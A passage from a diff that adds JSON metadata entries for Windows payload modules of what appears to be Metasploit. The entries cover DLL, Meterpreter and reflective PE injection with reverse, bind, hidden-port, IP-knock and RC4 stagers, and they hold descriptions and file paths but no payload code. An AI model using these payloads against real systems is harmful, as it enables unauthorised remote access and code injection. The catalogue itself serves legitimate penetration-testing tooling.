Stager (DNS)", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "RageLtMan" + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/patchupdllinject/reverse_tcp_rc4": { + "name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/patchupdllinject/reverse_tcp_rc4_dns": { + "name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/patchupdllinject/reverse_tcp_uuid": { + "name": "Windows Inject DLL, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/patchupdllinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jt ", + "skape ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupdllinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/patchupmeterpreter/bind_hidden_ipknock_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/patchupmeterpreter/bind_hidden_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager", + "fullname": "payload/windows/patchupmeterpreter/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/patchupmeterpreter/bind_ipv6_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/patchupmeterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/patchupmeterpreter/bind_ipv6_tcp_uuid": { + "name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/patchupmeterpreter/bind_named_pipe": { + "name": "Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/patchupmeterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "UserExistsError" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/patchupmeterpreter/bind_nonx_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupmeterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "vlad902 " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/patchupmeterpreter/bind_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/patchupmeterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/patchupmeterpreter/bind_tcp_rc4": { + "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/patchupmeterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/patchupmeterpreter/bind_tcp_uuid": { + "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/patchupmeterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/patchupmeterpreter/find_tag": { + "name": "Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager", + "fullname": "payload/windows/patchupmeterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/patchupmeterpreter/reverse_ipv6_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/patchupmeterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/patchupmeterpreter/reverse_nonx_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupmeterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "vlad902 " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/patchupmeterpreter/reverse_ord_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupmeterpreter/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "spoonm " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/patchupmeterpreter/reverse_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_allports": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_dns": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_rc4": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_rc4_dns": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_uuid": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/peinject/bind_hidden_ipknock_tcp": { + "name": "Windows Inject PE Files, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/peinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\n\n Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode", + "references": [ + "URL-https://github.com/EgeBalci/Amber", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/peinject/bind_hidden_tcp": { + "name": "Windows Inject PE Files, Hidden Bind TCP Stager", + "fullname": "payload/windows/peinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/EgeBalci/Amber", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/peinject/bind_ipv6_tcp": { + "name": "Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/peinject/bind_ipv6_tcp_uuid": { + "name": "Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/peinject/bind_named_pipe": { + "name": "Windows Inject PE Files, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "UserExistsError" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": 